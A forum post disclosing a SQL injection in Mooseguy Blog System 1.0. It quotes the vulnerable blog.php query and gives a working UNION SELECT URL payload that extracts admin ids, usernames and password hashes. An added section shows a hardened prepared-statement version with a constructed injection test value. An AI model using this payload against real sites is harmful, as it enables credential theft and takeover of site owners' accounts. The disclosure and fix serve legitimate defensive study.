THe-LaWRoS member
Post count: 31 Age: 34 Registration date: 08/02/08
Subject: Mooseguy Blog System 1.0 SQL Injection Fri Feb 08, 2008 10:06 pm
# MGBS 1.0 Remote SQL injection
# Script url http://sourceforge.net/project/showf...roup_id=193233

# Vulnerable code in blog.php
<?php
$month = $_GET['month'];
$result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
...

# Admin hash exploit
http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws( 0x3a,id,uname,upass),7,8+from+users/*

# Bug discovered by The_HuliGun
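A hardened counterpart to the blog.php query quoted in the post, given here as an added example that is not part of the original post or of the MGBS code: the month value is checked against an allow-list pattern and then bound as a parameter instead of being interpolated into the SQL string. It assumes `posted` holds a month as 'YYYY-MM'; the in-memory SQLite database (standing in for MySQL), the `title` column, the function names and the sample rows are constructed for the demonstration.

```php
<?php
// Added example, not MGBS code. Assumptions: `posted` stores 'YYYY-MM';
// the `title` column, function names and sample rows are constructed.
declare(strict_types=1);

function open_demo_db(): PDO
{
    // In-memory SQLite stands in for the MySQL database so this runs offline.
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec("CREATE TABLE blog (id INTEGER PRIMARY KEY, posted TEXT, title TEXT)");
    $pdo->exec("INSERT INTO blog (posted, title) VALUES
        ('2008-01', 'January post'), ('2008-02', 'First February post'),
        ('2008-02', 'Second February post')");
    return $pdo;
}

function posts_for_month(PDO $pdo, string $month): array
{
    // Allow-list the expected shape before the value reaches the database.
    if (preg_match('/\A\d{4}-(0[1-9]|1[0-2])\z/', $month) !== 1) {
        throw new InvalidArgumentException('month must look like YYYY-MM');
    }
    // The value is bound as data; it is never concatenated into the SQL text.
    $stmt = $pdo->prepare(
        'SELECT id, posted, title FROM blog WHERE posted = :month ORDER BY id DESC'
    );
    $stmt->execute([':month' => $month]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function render(PDO $pdo, ?string $raw): string
{
    try {
        $rows = posts_for_month($pdo, (string) $raw);
    } catch (InvalidArgumentException $e) {
        return "400 Bad Request\n"; // no database error text is echoed back
    }
    $out = '';
    foreach ($rows as $r) {
        $out .= htmlspecialchars($r['title'], ENT_QUOTES, 'UTF-8') . "\n";
    }
    return $out === '' ? "No posts\n" : $out;
}

$pdo = open_demo_db();
echo render($pdo, '2008-02');             // well-formed month
echo render($pdo, "2008-02' OR '1'='1");  // constructed value containing a quote
echo render($pdo, null);                  // missing ?month= parameter
```

In a web handler the second argument would be `$_GET['month'] ?? null`. The `mysql_query()` family used in the quoted code was removed in PHP 7, so moving to PDO or mysqli prepared statements is needed in any case.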